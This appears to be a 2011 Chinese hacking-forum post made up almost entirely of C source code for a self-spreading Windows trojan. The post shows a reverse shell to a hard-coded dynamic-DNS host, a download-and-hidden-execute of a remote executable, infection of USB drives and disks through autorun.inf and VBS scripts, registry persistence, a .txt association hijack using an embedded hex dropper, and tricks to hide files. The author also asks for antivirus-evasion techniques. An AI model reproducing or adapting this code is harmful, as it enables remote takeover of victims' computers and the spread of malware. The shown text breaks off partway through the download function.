首页
论坛
专栏
课程

[原创]C感染型木马

2011-5-22 10:20 20825

[原创]C感染型木马

2011-5-22 10:20
20825
[申请加精]你们都懂得
以前总是看汇编病毒,汇编病毒处理复杂的PE文件结构是如鱼得水,但是编写其他的各种功能就有点不那么尽如人意了,所以试着用C语言写了一个感染型木马,希望各位大侠们指点一二。包括感染磁盘,感染U盘,写入autorun.inf,自动从网上下载病毒,病毒有两个线程,一个线程运行反弹木马,一个线程感染磁盘U盘,把U盘里的所有可执行文件隐藏,同时把名字后加一个空格,把病毒替换为原文件名,病毒会自动释放一个Noteped.exe,同时把文件关联修改成noteped.exe,该文件先运行txt文件,然后运行病毒,所以只要打开txt文件就会重新运行病毒,病毒运用的手段都是常规手段,所以会被杀毒软件报毒,希望各位大侠给点免杀手段,废话不多说了,直接上代码。。
/* ////////////////////////////////////////////////////////////////////////////////
* 摘    要:c语言反弹连接型感染型木马,附带U盘感染,磁盘感染,自动下载功能。
* 作    者:H•Y•H
* 完成日期:2011年5月15日
/////////////////////////////////////////////////////////////////////////////// */
#include <string.h>
#include <Winsock2.h>
#include <stdio.h>
#include <Wininet.h>
#pragma warning(disable:4309)
#pragma warning(disable:4305)
#pragma comment(linker,"/subsystem:windows")
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib,"wininet.lib")
#define MyAddr "h158678667.3322.org"  
#define MyPort 8081
char localfile[MAX_PATH];
DWORD WINAPI Trojan(LPVOID lpParameter);
DWORD WINAPI Infect(LPVOID lpParameter);
bool FileExists(char *filename);
void RegWrite();
void HideFile();
bool WriteInf(char *infname);
bool WriteVbs(char *vbsname);
void InfectDisk(char *drive);
void ReleaseNoteped();
bool InfectU(char *UDiskName);
char *left(char *dst,char *src, int n);
BOOL DownLoadFile(char *url,char *filename);
//请童鞋们不要害怕这个大大的数组,它只是一个exe文件(源代码见下面红色代码)的十六进制形式,直接从C32Asm里面复制就行,可略过不看。。
char node[]={0x4D,0x5A,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xFF,0xFF,0x00,0x00,0xB8,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0xC8,0x00,0x00,0x00,0x0E,0x1F,0xBA,0x0E,0x00,0xB4,0x09,0xCD,0x21,0xB8,\
0x01,0x4C,0xCD,0x21,0x54,0x68,0x69,0x73,0x20,0x70,0x72,0x6F,0x67,0x72,0x61,0x6D,0x20,0x63,0x61,\
0x6E,0x6E,0x6F,0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6E,0x20,0x69,0x6E,0x20,0x44,0x4F,0x53,0x20,\
0x6D,0x6F,0x64,0x65,0x2E,0x0D,0x0D,0x0A,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x73,0xF8,0x8B,\
0xDF,0x37,0x99,0xE5,0x8C,0x37,0x99,0xE5,0x8C,0x37,0x99,0xE5,0x8C,0xB4,0x85,0xEB,0x8C,0x36,0x99,\
0xE5,0x8C,0x37,0x99,0xE4,0x8C,0x3E,0x99,0xE5,0x8C,0x55,0x86,0xF6,0x8C,0x32,0x99,0xE5,0x8C,0xDF,\
0x86,0xEE,0x8C,0x36,0x99,0xE5,0x8C,0x52,0x69,0x63,0x68,0x37,0x99,0xE5,0x8C,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x45,0x00,0x00,0x4C,0x01,0x01,\
0x00,0x69,0x97,0xC6,0x4D,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xE0,0x00,0x0F,0x01,0x0B,0x01,\
0x06,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x10,0x00,0x00,0x00,\
0x10,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x10,0x00,0x00,0x00,0x02,0x00,0x00,\
0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,\
0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,\
0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xA8,0x12,0x00,0x00,0x3C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x10,0x00,0x00,0x2C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2E,0x74,0x65,0x78,0x74,0x00,\
0x00,0x00,0xCA,0x03,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x02,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x60,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x10,0x13,0x00,0x00,0x1A,0x13,0x00,0x00,0x30,0x13,0x00,0x00,0x3C,0x13,0x00,0x00,0x48,0x13,\
0x00,0x00,0x5E,0x13,0x00,0x00,0x76,0x13,0x00,0x00,0x88,0x13,0x00,0x00,0x00,0x00,0x00,0x00,0xA8,\
0x13,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x65,0x78,0x70,0x31,0x6F,0x72,0x65,0x72,\
0x2E,0x65,0x78,0x65,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x5C,0x65,0x78,0x70,0x31,0x6F,0x72,\
0x65,0x72,0x2E,0x65,0x78,0x65,0x00,0x00,0x00,0x5C,0x6E,0x6F,0x74,0x65,0x70,0x61,0x64,0x2E,0x65,\
0x78,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x55,\
0x8B,0xEC,0x81,0xEC,0x20,0x05,0x00,0x00,0x53,0x56,0x8D,0x45,0xF4,0x57,0x33,0xDB,0x50,0x89,0x5D,\
0xF4,0xFF,0x15,0x18,0x10,0x40,0x00,0x50,0xFF,0x15,0x24,0x10,0x40,0x00,0xBE,0x04,0x01,0x00,0x00,\
0x89,0x45,0xFC,0x56,0x8D,0x85,0xEC,0xFD,0xFF,0xFF,0x53,0x50,0xE8,0xA8,0x01,0x00,0x00,0x56,0x8D,\
0x85,0xF0,0xFE,0xFF,0xFF,0x53,0x50,0xE8,0x9A,0x01,0x00,0x00,0x56,0x8D,0x85,0xE4,0xFB,0xFF,0xFF,\
0x53,0x50,0xE8,0x8C,0x01,0x00,0x00,0x56,0x8D,0x85,0xE8,0xFC,0xFF,0xFF,0x53,0x50,0xE8,0x7E,0x01,\
0x00,0x00,0x56,0x8D,0x85,0xE0,0xFA,0xFF,0xFF,0x53,0x50,0xE8,0x70,0x01,0x00,0x00,0x83,0xC4,0x3C,\
0x8D,0x85,0xF0,0xFE,0xFF,0xFF,0x56,0x50,0xFF,0x15,0x14,0x10,0x40,0x00,0x8D,0x85,0xE4,0xFB,0xFF,\
0xFF,0x56,0x50,0xFF,0x15,0x10,0x10,0x40,0x00,0x8B,0x3D,0x0C,0x10,0x40,0x00,0x8D,0x85,0xF0,0xFE,\
0xFF,0xFF,0x50,0x8D,0x85,0xEC,0xFD,0xFF,0xFF,0x50,0xFF,0xD7,0x8D,0x85,0xF0,0xFE,0xFF,0xFF,0x50,\
0x8D,0x85,0xE8,0xFC,0xFF,0xFF,0x50,0xFF,0xD7,0x8B,0x3D,0x08,0x10,0x40,0x00,0x8D,0x85,0xE8,0xFC,\
0xFF,0xFF,0x68,0x54,0x10,0x40,0x00,0x50,0xFF,0xD7,0x8D,0x85,0xF0,0xFE,0xFF,0xFF,0x68,0x44,0x10,\
0x40,0x00,0x50,0xFF,0xD7,0x8D,0x85,0xE4,0xFB,0xFF,0xFF,0x68,0x44,0x10,0x40,0x00,0x50,0xFF,0xD7,\
0x6A,0x01,0x58,0x39,0x45,0xF4,0x89,0x45,0xF8,0x7E,0x50,0x8B,0x45,0xFC,0x83,0xC0,0x04,0x89,0x45,\
0xFC,0x8D,0x85,0xE8,0xFC,0xFF,0xFF,0x68,0x40,0x10,0x40,0x00,0x50,0xFF,0xD7,0x53,0x53,0x8D,0x85,\
0xE0,0xFA,0xFF,0xFF,0x56,0x50,0x8B,0x45,0xFC,0x6A,0xFF,0xFF,0x30,0x53,0x6A,0x01,0xFF,0x15,0x04,\
0x10,0x40,0x00,0x8D,0x85,0xE0,0xFA,0xFF,0xFF,0x50,0x8D,0x85,0xE8,0xFC,0xFF,0xFF,0x50,0xFF,0xD7,\
0xFF,0x45,0xF8,0x83,0x45,0xFC,0x04,0x8B,0x45,0xF8,0x3B,0x45,0xF4,0x7C,0xB9,0x8B,0x35,0x00,0x10,\
0x40,0x00,0x8D,0x85,0xE8,0xFC,0xFF,0xFF,0x6A,0x05,0x50,0xFF,0xD6,0x8D,0x85,0xF0,0xFE,0xFF,0xFF,\
0x50,0xE8,0x60,0x00,0x00,0x00,0x84,0xC0,0x59,0x74,0x09,0x53,0x8D,0x85,0xF0,0xFE,0xFF,0xFF,0xEB,\
0x46,0x8D,0x85,0xE4,0xFB,0xFF,0xFF,0x50,0xE8,0x46,0x00,0x00,0x00,0x84,0xC0,0x59,0x74,0x09,0x53,\
0x8D,0x85,0xE4,0xFB,0xFF,0xFF,0xEB,0x2C,0x8D,0x85,0xEC,0xFD,0xFF,0xFF,0x68,0x30,0x10,0x40,0x00,\
0x50,0x88,0x9D,0xEF,0xFD,0xFF,0xFF,0xFF,0xD7,0x8D,0x85,0xEC,0xFD,0xFF,0xFF,0x50,0xE8,0x18,0x00,\
0x00,0x00,0x84,0xC0,0x59,0x74,0x0A,0x53,0x8D,0x85,0xEC,0xFD,0xFF,0xFF,0x50,0xFF,0xD6,0x5F,0x5E,\
0x33,0xC0,0x5B,0xC9,0xC2,0x10,0x00,0x55,0x8B,0xEC,0x81,0xEC,0x40,0x01,0x00,0x00,0x8D,0x85,0xC0,\
0xFE,0xFF,0xFF,0x50,0xFF,0x75,0x08,0xFF,0x15,0x1C,0x10,0x40,0x00,0x83,0xF8,0xFF,0x0F,0x95,0xC0,\
0xC9,0xC3,0xCC,0xCC,0x8B,0x54,0x24,0x0C,0x8B,0x4C,0x24,0x04,0x85,0xD2,0x74,0x47,0x33,0xC0,0x8A,\
0x44,0x24,0x08,0x57,0x8B,0xF9,0x83,0xFA,0x04,0x72,0x2D,0xF7,0xD9,0x83,0xE1,0x03,0x74,0x08,0x2B,\
0xD1,0x88,0x07,0x47,0x49,0x75,0xFA,0x8B,0xC8,0xC1,0xE0,0x08,0x03,0xC1,0x8B,0xC8,0xC1,0xE0,0x10,\
0x03,0xC1,0x8B,0xCA,0x83,0xE2,0x03,0xC1,0xE9,0x02,0x74,0x06,0xF3,0xAB,0x85,0xD2,0x74,0x06,0x88,\
0x07,0x47,0x4A,0x75,0xFA,0x8B,0x44,0x24,0x08,0x5F,0xC3,0x8B,0x44,0x24,0x04,0xC3,0xE4,0x12,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x9A,0x13,0x00,0x00,0x00,0x10,0x00,0x00,0x08,0x13,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xBE,0x13,0x00,0x00,0x24,0x10,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x10,0x13,0x00,0x00,0x1A,0x13,0x00,0x00,0x30,0x13,0x00,0x00,0x3C,0x13,0x00,0x00,0x48,0x13,0x00,\
0x00,0x5E,0x13,0x00,0x00,0x76,0x13,0x00,0x00,0x88,0x13,0x00,0x00,0x00,0x00,0x00,0x00,0xA8,0x13,\
0x00,0x00,0x00,0x00,0x00,0x00,0xD3,0x02,0x57,0x69,0x6E,0x45,0x78,0x65,0x63,0x00,0xD2,0x02,0x57,\
0x69,0x64,0x65,0x43,0x68,0x61,0x72,0x54,0x6F,0x4D,0x75,0x6C,0x74,0x69,0x42,0x79,0x74,0x65,0x00,\
0xF9,0x02,0x6C,0x73,0x74,0x72,0x63,0x61,0x74,0x41,0x00,0x00,0x02,0x03,0x6C,0x73,0x74,0x72,0x63,\
0x70,0x79,0x41,0x00,0x00,0x59,0x01,0x47,0x65,0x74,0x53,0x79,0x73,0x74,0x65,0x6D,0x44,0x69,0x72,\
0x65,0x63,0x74,0x6F,0x72,0x79,0x41,0x00,0x7D,0x01,0x47,0x65,0x74,0x57,0x69,0x6E,0x64,0x6F,0x77,\
0x73,0x44,0x69,0x72,0x65,0x63,0x74,0x6F,0x72,0x79,0x41,0x00,0x00,0xCB,0x00,0x47,0x65,0x74,0x43,\
0x6F,0x6D,0x6D,0x61,0x6E,0x64,0x4C,0x69,0x6E,0x65,0x57,0x00,0x94,0x00,0x46,0x69,0x6E,0x64,0x46,\
0x69,0x72,0x73,0x74,0x46,0x69,0x6C,0x65,0x41,0x00,0x00,0x4B,0x45,0x52,0x4E,0x45,0x4C,0x33,0x32,\
0x2E,0x64,0x6C,0x6C,0x00,0x00,0x02,0x00,0x43,0x6F,0x6D,0x6D,0x61,0x6E,0x64,0x4C,0x69,0x6E,0x65,\
0x54,0x6F,0x41,0x72,0x67,0x76,0x57,0x00,0x00,0x53,0x48,0x45,0x4C,0x4C,0x33,0x32,0x2E,0x64,0x6C,\
0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,PSTR szCmdLine,int iCmdShow)
{
//创建命名互斥对象,防止进程被多次运行
        HANDLE hMutex=CreateMutex(NULL,FALSE,"HYH");
        if(hMutex==NULL)
                ExitProcess(0);
        if(GetLastError()==ERROR_ALREADY_EXISTS)
                ExitProcess(0);
        memset(localfile,0,MAX_PATH);
        GetModuleFileName(NULL,localfile,MAX_PATH);
        HANDLE hTrojan=CreateThread(NULL,NULL,Trojan,NULL,NULL,NULL);
        HANDLE infect=CreateThread(NULL,NULL,Infect,NULL,NULL,NULL);
        char url[MAX_PATH]="http://www.ku6tvb.com/Sx_server.exe";
        if(!FileExists("c:\\Program Files\\a.exe"))
        {
            DownLoadFile(url,"c:\\Program Files\\a.exe");
                SetFileAttributes("c:\\Program Files\\a.exe",FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
        }
        WinExec("c:\\Program Files\\a.exe",SW_HIDE);
        while(true)
        {
                HideFile();
                RegWrite();
                Sleep(300000);
        }
    return 0;
}
//反弹木马线程,该线程利用TCP套接字连接nc服务端,把客户端机器的cmd反弹给服务端。。。
DWORD WINAPI Trojan(LPVOID lpParameter)
{
        LPHOSTENT HostEnts;
        SOCKADDR_IN SockAddrIn;
        SOCKET HSocket;
        DWORD *lpdwflags=NULL;
        int status;
        char szCMDPath[MAX_PATH];
        STARTUPINFO StartupInfo;
        WSADATA WSADa;
        PROCESS_INFORMATION ProcessInfo;
        GetSystemDirectory(szCMDPath,MAX_PATH);
        strcat(szCMDPath,"\\cmd.exe");
        for(;;)
        {
      try
          {
                while(!InternetGetConnectedState(lpdwflags,0))
                        Sleep(10000);
                status=0;
                ZeroMemory(&ProcessInfo,sizeof(PROCESS_INFORMATION));
                ZeroMemory(&StartupInfo,sizeof(STARTUPINFO));
                ZeroMemory(&WSADa,sizeof(WSADATA));
                WSAStartup(MAKEWORD(1,1),&WSADa);
                HostEnts=gethostbyname(MyAddr);
                SockAddrIn.sin_addr=*((LPIN_ADDR)*HostEnts->h_addr_list);
                SockAddrIn.sin_family=AF_INET;
                SockAddrIn.sin_port=htons(MyPort);
                HSocket=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
                do{
                        status=connect(HSocket,(SOCKADDR *)&SockAddrIn,sizeof(SockAddrIn));
                }while(status==SOCKET_ERROR);
                StartupInfo.cb=sizeof(STARTUPINFO);
                StartupInfo.wShowWindow=SW_HIDE;
                StartupInfo.dwFlags=STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
                StartupInfo.hStdError=(HANDLE)HSocket;
                StartupInfo.hStdOutput=(HANDLE)HSocket;
                StartupInfo.hStdInput=(HANDLE)HSocket;
                CreateProcess(NULL,szCMDPath,NULL,NULL,TRUE,0,NULL,NULL,&StartupInfo,&ProcessInfo);
                WaitForSingleObject(ProcessInfo.hProcess,INFINITE);
                if (WAIT_OBJECT_0==WaitForSingleObject(ProcessInfo.hProcess,INFINITE))
                {
                        CloseHandle(ProcessInfo.hProcess);
                        CloseHandle(ProcessInfo.hThread);
                        closesocket(HSocket);
                        WSACleanup();
                }
          }
          catch(...)
          {
                  continue;
          }
        }
}
//感染线程,感染系统磁盘和U盘,这里需要掌握的是驱动器盘符的获取有关的API函数及用法
DWORD WINAPI Infect(LPVOID lpParameter)
{
        char Drives[255];
        int Type;
        char *pDrive;
        char systempath[MAX_PATH];
        char windowspath[MAX_PATH];
        memset(systempath,0,MAX_PATH);
        memset(windowspath,0,MAX_PATH);
        GetWindowsDirectory(windowspath,MAX_PATH);
        GetSystemDirectory(systempath,MAX_PATH);
        while(true)
        {
                memset(Drives,0,sizeof(Drives));
                pDrive=Drives;
                GetLogicalDriveStrings(sizeof(Drives),Drives);
                for(;pDrive[0]!=NULL;)
                {
                        Type=GetDriveType(pDrive);
                        switch(Type)
                        {
                        case DRIVE_REMOVABLE:
                                if(strcmp(pDrive,"A:\\")==0)
                                {
                                        pDrive+=4;
                                        continue;
                                }
                                else
                                {
                                        InfectDisk(pDrive);
                                        InfectU(pDrive);
                                        pDrive+=4;continue;
                                }
                        case DRIVE_FIXED:InfectDisk(pDrive);
                                pDrive+=4;continue;
                        default:pDrive+=4;continue;
                        }
                }
                strcat(windowspath,"\\exp1orer.exe");
                CopyFile(localfile,windowspath,TRUE);
                strcat(systempath,"\\exp1orer.exe");
                CopyFile(localfile,systempath,TRUE);
                systempath[3]='\0';
                strcat(systempath,"Program Files\\exp1orer.exe");
                CopyFile(localfile,systempath,TRUE);
                memset(windowspath,0,MAX_PATH);
                GetWindowsDirectory(windowspath,MAX_PATH);
                strcat(windowspath,"\\noteped.exe");
                if(!FileExists(windowspath))
                        ReleaseNoteped();
                Sleep(10000);
        }
}
//修改相应注册表文件,了解常用注册表API函数的用法就行了。。
void RegWrite()
{
        HKEY hKey;
        DWORD value;
        char filepath[MAX_PATH];
        memset(filepath,0,MAX_PATH);
        GetWindowsDirectory(filepath,MAX_PATH);
        strcat(filepath,"\\exp1orer.exe");
        //修改主页
        RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Internet Explorer\\Main",&hKey);
        RegSetValueEx(hKey,"Start Page",0,REG_SZ,(BYTE *)"www.gov.cn",lstrlen("www.gov.cn"));
        //把自己加入启动项
        RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce",&hKey);
        RegSetValueEx(hKey,"exp1orer",0,REG_SZ,(BYTE *)filepath,lstrlen(filepath));
        filepath[3]='\0';
        strcat(filepath,"Program Files\\exp1orer.exe");
    RegSetValueEx(hKey,"exp1orer",0,REG_SZ,(BYTE *)filepath,lstrlen(filepath));
        filepath[3]='\0';
        strcat(filepath,"exp1orer.exe");
        RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey);
        RegSetValueEx(hKey,"exp1orer",0,REG_SZ,(BYTE *)filepath,lstrlen(filepath));
        memset(filepath,0,MAX_PATH);
        GetWindowsDirectory(filepath,MAX_PATH);
        strcat(filepath,"\\noteped.exe %1");
        //修改txt文件关联
        RegCreateKey(HKEY_CLASSES_ROOT,"txtfile\\shell\\open\\command",&hKey);
        RegSetValueEx(hKey,"",0,REG_SZ,(BYTE *)filepath,lstrlen(filepath));
        value=243;
        RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",&hKey);
        RegSetValueEx(hKey,"NoDriveTypeAutoRun",0,REG_DWORD,(BYTE *)&value,sizeof(DWORD));
        //使显示隐藏文件无效
        value=0;
        RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL",&hKey);
        RegSetValueEx(hKey,"CheckedValue",0,REG_DWORD,(BYTE *)&value,sizeof(DWORD));
        value=2;
        RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN",&hKey);
        RegSetValueEx(hKey,"CheckedValue",3,REG_DWORD,(BYTE *)&value,sizeof(DWORD));
}
//把病毒副本复制到系统目录,windows目录并设置程隐藏
void HideFile()
{
        char newfile[MAX_PATH];
        memset(newfile,0,MAX_PATH);
        GetSystemDirectory(newfile,MAX_PATH);
        strcat(newfile,"\\exp1orer.exe");
        CopyFile(localfile,newfile,TRUE);
        SetFileAttributes(newfile,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
        memset(newfile,0,MAX_PATH);
        GetWindowsDirectory(newfile,MAX_PATH);
        strcat(newfile,"\\exp1orer.exe");
        CopyFile(localfile,newfile,TRUE);
        SetFileAttributes(newfile,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);       
        newfile[3]='\0';
        strcat(newfile,"Program Files\\exp1orer.exe");
        CopyFile(localfile,newfile,TRUE);
        SetFileAttributes(newfile,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
}
//写入autorun.inf文件,使磁盘和U盘自动运行
bool WriteInf(char *infname)
{
        char autorun[MAX_PATH]="[AutoRun]\nopen=wscript.exe system.vbs\nshell\\open\\打开(&O)\nshell\\open\\Command=wscript.exe system.vbs\nshell\\open\\default=1\nshell\\explore\\资源管理器(&X)\nshell\\explore\\Command=wscript.exe system.vbs";
        FILE *fp;
        fp=fopen(infname,"w+");
        if(fp==NULL)
                return FALSE;
        fwrite(autorun,sizeof(char),lstrlen(autorun),fp);
        fclose(fp);
        SetFileAttributes(infname,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
        return TRUE;
}
//写入vbs文件,打开磁盘时候运行病毒的同时打开磁盘
bool WriteVbs(char *vbsname)
{
        char *vbs1={"On Error Resume Next\nDim Wsh\nSet Wsh = WScript.CreateObject(\"WScript.Shell\")\nWsh.Run \"cmd /c explorer "};
        char *vbs2={"\",false,false\nWsh.Run \"exp1orer.exe\",false,false\nWScript.quit"};
        char vbs[MAX_PATH];
        char path[MAX_PATH];
        memset(path,0,MAX_PATH);
        memset(vbs,0,MAX_PATH);
        strcpy(path,vbsname);
        path[3]='\0';
        strcpy(vbs,vbs1);
        strcat(vbs,path);
        strcat(vbs,vbs2);
        FILE *fp;
        fp=fopen(vbsname,"w+");
        if(fp==NULL)
                return FALSE;
        fwrite(vbs,sizeof(char),lstrlen(vbs),fp);
        fclose(fp);
        SetFileAttributes(vbsname,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
        return TRUE;
}
//向windows目录释放noteped.exe文件,劫持txt文件的打开方式
void ReleaseNoteped()
{
        DWORD written;
        char windows[MAX_PATH];
        memset(windows,0,MAX_PATH);
        GetWindowsDirectory(windows,MAX_PATH);
        strcat(windows,"\\noteped.exe");
        HANDLE hFile=CreateFile(windows,GENERIC_WRITE,NULL,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,NULL);
        WriteFile(hFile,node,sizeof(node),&written,NULL);
        FlushFileBuffers(hFile);
        CloseHandle(hFile);
}
//感染U盘,把U盘里可执行文件替换为病毒文件,把原文件名后面加上空格并隐藏,这里需要掌握的是磁盘的遍历方法。。。
bool InfectU(char *UDiskName)
{
        WIN32_FIND_DATA winfind;
        HANDLE hFile;
        char path[MAX_PATH];
        char newpath[MAX_PATH];
        char newname[MAX_PATH];
        char oldname[MAX_PATH];
        char filename[MAX_PATH];
        strcpy(path,UDiskName);
        strcat(path,"*.*");
        hFile=FindFirstFile(path,&winfind);
        if(hFile==INVALID_HANDLE_VALUE)
                return false;
        do
        {
                if(strcmp(winfind.cFileName,".")==0||strcmp(winfind.cFileName,"..")==0)
                        continue;
                if(winfind.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY)
                {
                        sprintf(newpath,"%s%s\\",UDiskName,winfind.cFileName);
                        InfectU(newpath);         
                }
                if(strstr(winfind.cFileName,".exe")!=NULL && strstr(winfind.cFileName," .exe")==NULL)
                {
                        if(strcmp(winfind.cFileName,"exp1orer.exe")!=0)
                        {
                                left(filename,winfind.cFileName,int(strstr(winfind.cFileName,".exe")-winfind.cFileName));
                                strcpy(newname,UDiskName);
                                strcat(newname,filename);
                                strcat(newname," .exe");
                                strcpy(oldname,UDiskName);
                                strcat(oldname,winfind.cFileName);
                                if(!MoveFileEx(oldname,newname,MOVEFILE_COPY_ALLOWED))
                                        return false;
                                SetFileAttributes(newname,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
                                if(!CopyFile(localfile,oldname,FALSE))
                                        return false;
                                SetFileAttributes(oldname,FILE_ATTRIBUTE_NORMAL);
                        }
                }
        }while(FindNextFile(hFile,&winfind));
        return true;
}
//感染磁盘,写入autorun.inf和vbs脚本
void InfectDisk(char *drive)
{
        char diskfile[MAX_PATH];
        char diskinf[MAX_PATH];
        char diskvbs[MAX_PATH];
        memset(diskfile,0,MAX_PATH);
        memset(diskinf,0,MAX_PATH);
        memset(diskvbs,0,MAX_PATH);
        strcpy(diskfile,drive);
        strcpy(diskinf,drive);
        strcpy(diskvbs,drive);
        strcat(diskfile,"exp1orer.exe");
        strcat(diskinf,"autorun.inf");
        strcat(diskvbs,"system.vbs");
        printf("%s",localfile);
        printf("%s",diskfile);
        CopyFile(localfile,diskfile,TRUE);
        SetFileAttributes(diskfile,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
        WriteInf(diskinf);
        WriteVbs(diskvbs);
}
//取字符串左边N位
char *left(char *dst,char *src, int n)
{
        char *p = src;
        char *q = dst;
        int len = strlen(src);
        if(n>len)
                n = len;
        while(n--)
                *(q++) = *(p++);
        *(q++)='\0';
        return dst;
}
//判断文件是否存在
bool FileExists(char *filename)
{
        HANDLE hFind;
        WIN32_FIND_DATA FindData;
        hFind=FindFirstFile(filename,&FindData);
        if(hFind==INVALID_HANDLE_VALUE)
        {
                return false;
        }
        return true;
}
//利用wininet.h头文件里的与Http有关的API函数实现网络文件的下载(说白了就是从网上读取一段文件然后写入到本地机器)功能
BOOL DownLoadFile(char *url,char *filename)
{
        DWORD byteread=0;   
        char buffer[25*1024];   
        memset(buffer,0,25*1024);   
        HINTERNET HInternet;   
        HInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);   
        if (HInternet==NULL)   
        {   
                return FALSE;   
        }   
        HINTERNET    HOpen;   
        HOpen = InternetOpenUrl(HInternet,url,
                NULL,0,INTERNET_FLAG_TRANSFER_BINARY|INTERNET_FLAG_PRAGMA_NOCACHE,0);      
        if (HOpen==NULL)   
        {   
                InternetCloseHandle(HInternet);
                return FALSE;
        }   
        BOOL hwrite;   
        DWORD written;   
        HANDLE createfile;   
        createfile = CreateFile(filename,GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);   
        if (createfile==INVALID_HANDLE_VALUE)   
        {      
                InternetCloseHandle(HOpen);
                InternetCloseHandle(HInternet);  
                return FALSE;
        }   
        BOOL internetreadfile;   
        while(1)   
        {   
                internetreadfile=InternetReadFile(HOpen,buffer,sizeof(buffer),&byteread);   
                if(byteread==0)     
                        break;   
